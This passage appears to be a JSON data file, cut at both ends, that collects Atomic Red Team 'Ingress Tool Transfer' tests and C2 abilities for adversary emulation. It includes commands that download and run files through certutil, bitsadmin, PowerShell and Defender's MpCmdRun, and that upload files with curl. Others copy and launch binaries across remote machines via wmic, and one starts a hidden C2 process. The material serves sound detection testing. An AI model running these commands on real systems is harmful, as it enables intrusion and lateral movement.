[System.IO.Compression.ZipFile]::ExtractToDirectory(\"PSTools.zip\", \"C:\\Windows\\System32\\PSTools\");\n" + ], + "commands": [ + { + "command": "rsync -r #{local_path} #{username}@#{remote_host}:/tmp/victim-files\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{local_path} #{username}@victim-host:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r /tmp/adversary-rsync/ #{username}@#{remote_host}:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{local_path} victim@#{remote_host}:#{remote_path}\n", + 
"source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{username}@#{remote_host}:/tmp/adversary-rsync/ #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{username}@adversary-host:#{remote_path} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{username}@#{remote_host}:#{remote_path} /tmp/victim-files\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{local_file} #{username}@#{remote_host}:/tmp/victim-files/\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp /tmp/adversary-scp #{username}@#{remote_host}:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{local_file} #{username}@victim-host:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{local_file} victim@#{remote_host}:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{username}@adversary-host:#{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp 
#{username}@#{remote_host}:/tmp/adversary-scp #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp adversary@#{remote_host}:#{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@#{remote_host}:/tmp/victim-files/ <<< $'put #{local_file}'\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@adversary-host:#{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@#{remote_host}:/tmp/adversary-sftp #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp adversary@#{remote_host}:#{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "cmd /c certutil -urlcache -split -f 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f #{remote_file}\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} %temp%\\Atomic-license.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}\n", + "source": 
"atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "(New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\", \"#{destination_path}\")\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "(New-Object System.Net.WebClient).DownloadFile(\"#{remote_file}\", \"$env:TEMP\\Atomic-license.txt\")\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "pushd \\\\localhost\\C$\necho var fileObject = WScript.createobject(\"Scripting.FileSystemObject\");var newfile = fileObject.CreateTextFile(\"AtomicTestFileT1105.js\", true);newfile.WriteLine(\"This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.\");newfile.Close(); > AtomicTestT1105.js\nCScript.exe AtomicTestT1105.js //E:JScript\ndel AtomicTestT1105.js /Q >nul 2>&1\ndel AtomicTestFileT1105.js /Q >nul 2>&1\npopd\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "copy C:\\Windows\\System32\\cmd.exe C:\\svchost.exe\nC:\\svchost.exe /c echo T1105 > \\\\localhost\\c$\\T1105.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url #{remote_file} -path %temp%\\Atomic-license.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team 
Test - Ingress Tool Transfer" + }, + { + "command": "timeout --preserve-status #{timeout} whois -h localhost -p #{remote_port} \"#{query}\" > #{output_file}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": null, + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"#{query}\" > /tmp/T1105.whois.out\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"Hello from Atomic Red Team test T1105\" > #{output_file}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File #{output_file}; Invoke-Item #{output_file}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "finger base64_filedata@localhost\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$imewdbled = $env:SystemRoot + 
\"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled #{remote_url}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\programdata\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\\allthethingsx64.dll\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\Curl.exe -k #{file_download} -o c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} --output c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} -o c:\\programdata\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} -o %Temp%\\allthethingsx64.dll\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\Curl.exe -T #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe --upload-file #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe -d #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe --data #{file_path} #{remote_destination}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool 
Transfer" + }, + { + "command": "#{curl_path} -T #{file_path} www.example.com\n#{curl_path} --upload-file #{file_path} www.example.com\n#{curl_path} -d #{file_path} www.example.com\n#{curl_path} --data #{file_path} www.example.com\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "#{curl_path} -T c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} --upload-file c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} -d c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} --data c:\\temp\\atomictestfile.txt #{remote_destination}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "PathToAtomicsFolder\\T1105\\src\\T1105.bat 1>NUL \n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"$env:comspec\" \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" 
\"\\\\$machine\\#{remote_drive_letter}$\\Windows\\Temp\\T1105.exe\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:\\Windows\\Temp\\T1105.exe\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\C$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i C:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\PrintBrm.zip >nul 2>&1 \n#{Path_PrintBrm} -b -d \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\ -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\PrintBrm.zip >nul 2>&1 \nC:\\Windows\\System32\\spool\\tools\\PrintBrm.exe -b -d #{Path_unc} -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} PathToAtomicsFolder\\T1105\\src\\redcanary.cab %TEMP% /A\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\nC:\\Windows\\System32\\replace.exe #{replace_cab} %TEMP% /A\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - 
Ingress Tool Transfer" + }, + { + "command": "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\redcanary.cab %TEMP% /A\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$wc=New-Object System.Net.WebClient;\n$output=\"PowerShellCore.msi\";\n$wc.DownloadFile(\"https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi\", $output);\nStart-Process msiexec.exe -ArgumentList \"/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1\" -Wait;\n$env:Path += \";C:\\Program Files\\Powershell\\6\";\nStart-Process pwsh -ArgumentList \"-c #{location} -server #{server} - group #{group}\" -WindowStyle hidden;\n", + "source": "data/abilities/command-and-control/60f63260-39bb-4136-87a0-b6c2dca799fc.yml", + "name": "Download, install and start new process under PowerShell Core 6" + }, + { + "command": "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadFile(\"https://download.sysinternals.com/files/PSTools.zip\", \"PSTools.zip\");\nNew-Item -ItemType \"directory\" C:\\Windows\\System32\\PSTools -Force;\nAdd-Type -Assembly 'System.IO.Compression.FileSystem'; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"PSTools.zip\", \"C:\\Windows\\System32\\PSTools\");\n", + "source": "data/abilities/command-and-control/eb814e03-811a-467a-bc6d-dcd453750fa2.yml", + "name": "Download and install PSTools by unzipping the file" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1105", + "display_name": "Ingress Tool Transfer", + "atomic_tests": [ + { + "name": "rsync remote file copy (push)", + "auto_generated_guid": "0fc6e977-cb12-44f6-b263-2824ba917409", + "description": "Utilize rsync to perform a remote file copy (push)\n", + "supported_platforms": [ + 
"linux", + "macos" + ], + "input_arguments": { + "remote_path": { + "description": "Remote path to receive rsync", + "type": "Path", + "default": "/tmp/victim-files" + }, + "remote_host": { + "description": "Remote host to copy toward", + "type": "String", + "default": "victim-host" + }, + "local_path": { + "description": "Path of folder to copy", + "type": "Path", + "default": "/tmp/adversary-rsync/" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "victim" + } + }, + "executor": { + "command": "rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}\n", + "name": "bash" + } + }, + { + "name": "rsync remote file copy (pull)", + "auto_generated_guid": "3180f7d5-52c0-4493-9ea0-e3431a84773f", + "description": "Utilize rsync to perform a remote file copy (pull)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_path": { + "description": "Path of folder to copy", + "type": "Path", + "default": "/tmp/adversary-rsync/" + }, + "remote_host": { + "description": "Remote host to copy from", + "type": "String", + "default": "adversary-host" + }, + "local_path": { + "description": "Local path to receive rsync", + "type": "Path", + "default": "/tmp/victim-files" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "adversary" + } + }, + "executor": { + "command": "rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}\n", + "name": "bash" + } + }, + { + "name": "scp remote file copy (push)", + "auto_generated_guid": "83a49600-222b-4866-80a0-37736ad29344", + "description": "Utilize scp to perform a remote file copy (push)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_path": { + "description": "Remote path to receive scp", + "type": "Path", + "default": "/tmp/victim-files/" + }, + "local_file": { + "description": "Path of file to copy", + "type": 
"Path", + "default": "/tmp/adversary-scp" + }, + "remote_host": { + "description": "Remote host to copy toward", + "type": "String", + "default": "victim-host" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "victim" + } + }, + "executor": { + "command": "scp #{local_file} #{username}@#{remote_host}:#{remote_path}\n", + "name": "bash" + } + }, + { + "name": "scp remote file copy (pull)", + "auto_generated_guid": "b9d22b9a-9778-4426-abf0-568ea64e9c33", + "description": "Utilize scp to perform a remote file copy (pull)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_host": { + "description": "Remote host to copy from", + "type": "String", + "default": "adversary-host" + }, + "local_path": { + "description": "Local path to receive scp", + "type": "Path", + "default": "/tmp/victim-files/" + }, + "remote_file": { + "description": "Path of file to copy", + "type": "Path", + "default": "/tmp/adversary-scp" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "adversary" + } + }, + "executor": { + "command": "scp #{username}@#{remote_host}:#{remote_file} #{local_path}\n", + "name": "bash" + } + }, + { + "name": "sftp remote file copy (push)", + "auto_generated_guid": "f564c297-7978-4aa9-b37a-d90477feea4e", + "description": "Utilize sftp to perform a remote file copy (push)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_path": { + "description": "Remote path to receive sftp", + "type": "Path", + "default": "/tmp/victim-files/" + }, + "local_file": { + "description": "Path of file to copy", + "type": "Path", + "default": "/tmp/adversary-sftp" + }, + "remote_host": { + "description": "Remote host to copy toward", + "type": "String", + "default": "victim-host" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": 
"String", + "default": "victim" + } + }, + "executor": { + "command": "sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'\n", + "name": "bash" + } + }, + { + "name": "sftp remote file copy (pull)", + "auto_generated_guid": "0139dba1-f391-405e-a4f5-f3989f2c88ef", + "description": "Utilize sftp to perform a remote file copy (pull)\n", + "supported_platforms": [ + "linux", + "macos" + ], + "input_arguments": { + "remote_host": { + "description": "Remote host to copy from", + "type": "String", + "default": "adversary-host" + }, + "local_path": { + "description": "Local path to receive sftp", + "type": "Path", + "default": "/tmp/victim-files/" + }, + "remote_file": { + "description": "Path of file to copy", + "type": "Path", + "default": "/tmp/adversary-sftp" + }, + "username": { + "description": "User account to authenticate on remote host", + "type": "String", + "default": "adversary" + } + }, + "executor": { + "command": "sftp #{username}@#{remote_host}:#{remote_file} #{local_path}\n", + "name": "bash" + } + }, + { + "name": "certutil download (urlcache)", + "auto_generated_guid": "dd3b61dd-7bbc-48cd-ab51-49ad1a776df0", + "description": "Use certutil -urlcache argument to download a file from the web. 
Note - /urlcache also works!\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to copy", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "local_path": { + "description": "Local path to place file", + "type": "Path", + "default": "Atomic-license.txt" + } + }, + "executor": { + "command": "cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}\n", + "cleanup_command": "del #{local_path} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "certutil download (verifyctl)", + "auto_generated_guid": "ffd492e3-0455-4518-9fb1-46527c9f241b", + "description": "Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to copy", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "local_path": { + "description": "Local path to place file", + "type": "Path", + "default": "Atomic-license.txt" + } + }, + "executor": { + "command": "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f #{remote_file}\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }\n", + "cleanup_command": "Remove-Item \"certutil-$(Get-Date -format yyyy_MM_dd)\" -Force -Recurse -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Windows - BITSAdmin BITS Download", + "auto_generated_guid": "a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b", + "description": "This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.\nThis technique is used by Qbot malware to download payloads.\n", + "supported_platforms": [ + "windows" + ], + 
"input_arguments": { + "bits_job_name": { + "description": "Name of the created BITS job", + "type": "String", + "default": "qcxjb7" + }, + "local_path": { + "description": "Local path to place file", + "type": "Path", + "default": "%temp%\\Atomic-license.txt" + }, + "remote_file": { + "description": "URL of file to copy", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + } + }, + "executor": { + "command": "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}\n", + "name": "command_prompt" + } + }, + { + "name": "Windows - PowerShell Download", + "auto_generated_guid": "42dc4460-9aa6-45d3-b1a6-3955d34e1fe8", + "description": "This test uses PowerShell to download a payload.\nThis technique is used by multiple adversaries and malware families.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to copy", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "destination_path": { + "description": "Destination path to file", + "type": "Path", + "default": "$env:TEMP\\Atomic-license.txt" + } + }, + "executor": { + "command": "(New-Object System.Net.WebClient).DownloadFile(\"#{remote_file}\", \"#{destination_path}\")\n", + "cleanup_command": "Remove-Item #{destination_path} -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "OSTAP Worming Activity", + "auto_generated_guid": "2ca61766-b456-4fcf-a35a-1233685e1cad", + "description": "OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "destination_path": { + "description": "Path to create remote file at. 
Default is local admin share.", + "type": "String", + "default": "\\\\localhost\\C$" + } + }, + "executor": { + "command": "pushd #{destination_path}\necho var fileObject = WScript.createobject(\"Scripting.FileSystemObject\");var newfile = fileObject.CreateTextFile(\"AtomicTestFileT1105.js\", true);newfile.WriteLine(\"This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.\");newfile.Close(); > AtomicTestT1105.js\nCScript.exe AtomicTestT1105.js //E:JScript\ndel AtomicTestT1105.js /Q >nul 2>&1\ndel AtomicTestFileT1105.js /Q >nul 2>&1\npopd\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "svchost writing a file to a UNC path", + "auto_generated_guid": "fa5a2759-41d7-4e13-a19c-e8f28a53566f", + "description": "svchost.exe writing a non-Microsoft Office file to a file with a UNC path.\nUpon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\\`, then execute svchost.exe with output to a txt file.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy C:\\Windows\\System32\\cmd.exe C:\\svchost.exe\nC:\\svchost.exe /c echo T1105 > \\\\localhost\\c$\\T1105.txt\n", + "cleanup_command": "del C:\\T1105.txt >nul 2>&1\ndel C:\\\\svchost.exe >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Download a File with Windows Defender MpCmdRun.exe", + "auto_generated_guid": "815bef8b-bf91-4b67-be4c-abe4c2a94ccc", + "description": "Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed).\nThe input arguments \"remote_file\" and \"local_path\" can be used to specify the download URL and the name of the output file.\nBy default, the test downloads the Atomic Red Team license file to the temp directory.\n\nMore info and how to find your version can be found here 
https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_file": { + "description": "URL of file to download", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" + }, + "local_path": { + "description": "Location to save downloaded file", + "type": "Path", + "default": "%temp%\\Atomic-license.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Must have one of these Windows Defender versions installed: 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9", + "prereq_command": "$retVal = 1\nforeach ($version in @(\"4.18.2007.8-0\",\"4.18.2007.9\",\"4.18.2009.9\")){\n if (Test-Path \"$env:ProgramData\\Microsoft\\Windows Defender\\Platform\\$version\") { $retVal = 0}\n}\nexit $retVal\n", + "get_prereq_command": "Write-Host \"Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 must be installed manually\"" + } + ], + "executor": { + "command": "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url #{remote_file} -path #{local_path}\n", + "cleanup_command": "del #{local_path} >nul 2>&1\ndel %temp%\\MpCmdRun.log >nul 2>&1", + "name": "command_prompt" + } + }, + { + "name": "whois file download", + "auto_generated_guid": 